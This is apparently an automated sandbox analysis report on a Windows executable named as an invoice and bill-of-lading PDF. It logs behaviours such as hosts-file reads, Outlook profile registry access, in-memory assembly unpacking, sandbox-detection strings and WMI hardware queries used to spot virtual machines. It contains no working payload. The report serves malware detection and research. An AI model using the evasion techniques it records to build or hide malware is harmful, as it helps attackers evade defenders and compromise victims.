                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: INVOICE & TELEX BL_PDF.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 6.0.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 6.2.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.0.INVOICE & TELEX BL_PDF.exe.cb0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150D984 push esp; retf 7_2_0150D9D9
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150B4D0 push es; ret 7_2_0150B4E0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01504772 push 8BFFFFFFh; retf 7_2_01504778
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0154D95C push eax; ret 7_2_0154D95D
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0154E348 push eax; ret 7_2_0154E349
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.07881846434
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.26185cc.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.314615327.0000000002647000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 6708, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
